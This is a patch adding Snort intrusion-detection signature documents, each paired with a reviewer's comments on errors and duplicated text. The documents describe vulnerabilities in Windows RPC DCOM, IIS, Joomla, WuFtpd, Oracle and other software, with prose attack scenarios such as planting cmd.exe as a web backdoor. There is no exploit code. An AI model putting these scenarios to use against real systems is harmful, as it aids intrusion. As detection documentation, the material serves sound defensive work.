+This event indicates that a file was successfully copied using Windows command line shell.  The string "1 file(s) copied" is shown after the successful completion of a Windows "copy" command. 
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has successfully executed the copy command. Note that the source address of this event is actually the victim and not that of the attacker.
+
+--
+
+Attack Scenarios: 
+An attacker gains an access to a Windows web server via an IIS vulnerability and then copies "cmd.exe" into the directory accessible by the web server, thus creating a backdoor to access the system.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Investigate the web server for other signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
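Review bot: The Affected Systems section is missing from this file; every other signature in the patch carries one, and here it should name Windows hosts, which the Detailed Information already ties to the Windows "copy" command. Impact says the attacker "may have the ability to transfer files from the victim host", whereas Detailed Information and Attack Scenarios describe copying files on the victim (cmd.exe copied into a web directory); make the two consistent. Minor: "gains an access" should read "gains access", and the extra blank lines between "--" and the section headings (Attack Scenarios, Ease of Attack, False Positives, Corrective Action) break the layout used in the other files.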
--- /dev/null
+++ b/doc/signatures/3270.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3270
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
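Review bot: The text of this file is identical, apart from the Sid, to the files for 3160, 3235 and 3220 in this same patch, so nothing tells an analyst which RPC DCOM detection variant fires under 3270; each of the four should state what distinguishes its rule (the RPC operation or transport it matches). Attack Scenarios ("a request for a file with an overly long filename via a network share") is not connected to the "malformed data via RPC" description in Detailed Information; one sentence linking the overly long name to the malformed DCOM request would make the scenario coherent. Typo under Ease of Attack: "Expoit" should be "Exploit", and Additional References is empty for what the Summary calls a known vulnerability.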
--- /dev/null
+++ b/doc/signatures/100000463.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000463
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Joomla" application running on a webserver. 
+Access to the file "joomla.php" using a remote file being passed as the 
+"includepath" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "includepath" parameter in the "joomla.php" script used 
+by the "Joomla" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Joomla
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
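Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application...") and the Attack Scenarios paragraph describe credential-validation weaknesses, not the remote file include via the "includepath" parameter of "joomla.php" that the Summary documents; replace them with a scenario that matches the rule (a remote URL supplied as the include path), and since the second paragraph says the impact depends on missing input checks, Corrective Action could also mention validating that parameter. Style: blank lines are missing before the "--" separators after the Sid, Affected Systems and Contributors sections, "ona web server" should be "on a web server", and "attackers choosing" should be "attacker's choosing".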
--- /dev/null
+++ b/doc/signatures/372.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+372
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Delphi software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Delphi software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS155
+
+--
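Review bot: Detailed Information says the Delphi echo request "contains a unique payload" but never says what that payload is, so an analyst cannot confirm a hit against the packet; document the payload pattern the rule matches. The Contributors line gives Max Vision's address as "vision@whitehats.org" while the other files in this patch use "vision@whitehats.com"; check which is correct. Typo under False Positives: "legimately" should be "legitimately".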
--- /dev/null
+++ b/doc/signatures/3160.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3160
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
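Review bot: This file duplicates the 3270 text word for word, typo "Expoit" included, with only the Sid changed; see the comment on that file. At minimum the Summary here should say what rule 3160 matches that 3270, 3235 and 3220 do not, otherwise the four documents give an analyst no way to tell the alerts apart.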
--- /dev/null
+++ b/doc/signatures/1144.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1144
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
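Review bot: Summary and Detailed Information are generic ("a known vulnerability on a web server or a web application") and never identify the request path or content that rule 1144 matches, so the document cannot be used to triage the alert; name the URI or application the rule is written for and add a reference under Additional References, which is empty. The same generic text appears verbatim under Sid 1564 later in this patch. Minor: "attackers choosing" should be "attacker's choosing".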
--- /dev/null
+++ b/doc/signatures/3235.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3235
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
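Review bot: Same duplicated RPC DCOM text as 3270 and 3160, including "Expoit" under Ease of Attack; the Summary should state the specific condition rule 3235 detects, and the empty Additional References should carry the vendor advisory for the vulnerability the file calls known.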
--- /dev/null
+++ b/doc/signatures/1564.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1564
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
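Review bot: This file is a verbatim copy of the 1144 document with only the Sid changed; as with 1144 it names no URI, application or reference, so please state what request rule 1564 matches and fill in Additional References. "attackers choosing" should be "attacker's choosing".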
--- /dev/null
+++ b/doc/signatures/2825.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2825
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
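Review bot: The procedure name in Detailed Information is broken across lines so that the period sits alone at the start of the next line ("validate_flavor_definition" / ". This procedure is included in" / "sys.dbms_repcat_fla."); rejoin it as "the procedure validate_flavor_definition. This procedure is included in sys.dbms_repcat_fla." Affected Systems reads "Oracle Oracle9i", a duplicated word; Corrective Action "Apply the appropriate vendor supplied patch" is missing its period, and Additional References is empty for a known vulnerability.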
--- /dev/null
+++ b/doc/signatures/2389.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2389
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd RNTO command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the RNTO command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the RNTO 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
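Review bot: Affected Systems ("Multiple systems using affected C libraries, libc") does not agree with the Summary, which presents this as a WuFtpd RNTO vulnerability; since Detailed Information places the flaw in realpath(), state plainly that the overflow is in the C library's realpath() as reached through WuFtpd's RNTO command, and list the affected WuFtpd and libc versions so readers can tell whether they are exposed. The Corrective Action items "Use scp as an alternative to ftp", "Disallow ftp access to internal resources from external sources" and "Recompile binaries statically linked to the system libc implementation" lack terminating periods, the Brian Caswell line under Contributors has trailing whitespace, and Additional References is empty.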
--- /dev/null
+++ b/doc/signatures/1857.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+1857
+--
+Summary:
+This event is generated when a client is requesting the file "robot.txt"
+from a web server.
+
+--
+Impact:
+Information Disclosure. This file may contain data that could provide an
+attacker with information that could assist in an attack on the server.
+
+--
+Detailed Information:
+In the early days of the web, when search engines first began indexing 
+sites, it was often desirable to tell the indexing programs, referred 
+to as robots, not to index certain parts of a site. A standarized 
+method of accomplishing this was created; by placing a file called 
+"robot.txt" or "robots.txt" in the root of your web site which search 
+engines could read and which would tell them what parts of your site you
+did not want indexed. However, this file can also be very valuable to 
+potential attackers if it contains information such as restricted 
+directories, cgi-bin locations, etc.
+
+--
+Affected Systems:
+Any web site that uses this method to communicate with robots.
+
+--
+Attack Scenarios:
+An attacker can read the "robot.txt" file and use any sensitive data in 
+it to profile your site in preparation for an attack.
+
+--
+Ease of Attack:
+Simple. No exploit software required. Any browser can request a copy of 
+"robot.txt" from the server.
+
+--
+False Positives:
+Many. Most automated search engine indexing programs still request this 
+file prior to crawling through a web site.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure that your "robot.txt" file, if you need one, does not contain any
+sensitive data.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
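Review bot: Detailed Information says the file may be called "robot.txt" or "robots.txt", but the standardized name is robots.txt; the rule documented here matches the "robot.txt" spelling, so the text should say that explicitly, and the False Positives paragraph ("Most automated search engine indexing programs still request this file") should be re-checked, since legitimate indexers request robots.txt rather than robot.txt. Typo: "standarized" should be "standardized". Style: blank lines are missing after "Rule:" and after the Sid, unlike the other files.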
--- /dev/null
+++ b/doc/signatures/297.txt
@@ -0,0 +1,59 @@
+SID:
+297
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
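Review bot: The section layout in this file differs from every other file in the patch: "SID:" comes before "Rule:", the "--" separators follow each section instead of preceding the next heading, the final heading is "References:" rather than "Additional References:", and the Sid heading is upper-cased; please normalize to the common layout so tooling that parses these files handles them uniformly. Under Impact, "as the root user, This can lead" is a comma splice; use a period. The Affected Systems and Corrective Action sentences lack terminating periods.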
--- /dev/null
+++ b/doc/signatures/1729.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1729
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
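Review bot: The Affected Systems section is missing from this file. The Summary ("activity relating to network chat clients") does not say which protocol or client rule 1729 matches, even though the only reference given is the IRC protocol; state the protocol and the specific pattern (command or string) the rule looks for so the alert can be triaged. Typo under Impact: "unkown" should be "unknown".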
--- /dev/null
+++ b/doc/signatures/973.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+973
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with a file with a .idc extension. 
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the victim server.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) supports files extensions including .idc that call the ISM.DLL.  A buffer overflow vulnerability exists in ISM.DLL code when it receives a malformed request, permitting the execution of arbitrary code.  
+
+--
+Affected Systems:
+IIS 4.0 hosts
+
+--
+Attack Scenarios:
+An attacker can send a malformed request of a .idc file that causes a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0874
+
+Bugtraq:
+http://www.securityfocus.com/bid/307
+
+--
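Review bot: The line after "Upgrade to a more current version of IIS." contains a single stray space; remove it. In Detailed Information, "supports files extensions including .idc" should read "file extensions", and Affected Systems gives only "IIS 4.0 hosts" while the reference is to CAN-1999-0874; if other IIS versions are affected they should be listed. Style: the reference header "CVE" lacks the colon used on "Bugtraq:".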
--- /dev/null
+++ b/doc/signatures/2506.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2506
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
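Review bot: Detailed Information describes an "invalid field" in SSL Version 3 requests without saying which field or record the rule inspects, and Additional References is empty for what the Summary calls a known vulnerability; add the vendor advisory and name the field so the rule can be validated. Typo under Attack Scenarios: "attcker" should be "attacker"; the sentence "SSL requests containing an invalid field, sent to vulnerable systems can cause" needs a comma after "systems". Style: a blank line is missing between "Denial of Service (DoS)." and the following "--", and "Apply the appropriate vendor supplied patches" lacks a period.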
--- /dev/null
+++ b/doc/signatures/3220.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3220
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
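Review bot: Fourth verbatim copy of the RPC DCOM text (3270, 3160, 3235), again with "Expoit" under Ease of Attack and an empty Additional References; as for the others, the Summary needs a sentence saying what rule 3220 specifically detects.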
--- /dev/null
+++ b/doc/signatures/1072.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1072
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
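Review bot: The Affected Systems section is empty. Detailed Information says traversal attacks target "web, web applications and ftp servers" while Attack Scenarios speaks only of browsing "outside the ftp root directory"; say which service and which traversal pattern rule 1072 matches so that both the affected list and the scenario can be filled in consistently. Corrective Action "Apply the appropriate vendor supplied patches" lacks a period, and "Rule:  " has trailing whitespace.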
--- /dev/null
+++ b/doc/signatures/640.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 640
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
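Review bot: "Original Rule Writer Unkown" under Contributors should read "Unknown", and the file has no Affected Systems section even though Detailed Information names the platform ("IRIX MIPS network services"); add that section in the layout used by the other files in this patch and list the IRIX targets there. The sentence "A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present" needs the comma moved before "however" (with a second one after it), and "execute  attacker-controlled" has a doubled space.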
--- /dev/null
+++ b/doc/signatures/1288.txt
@@ -0,0 +1,69 @@
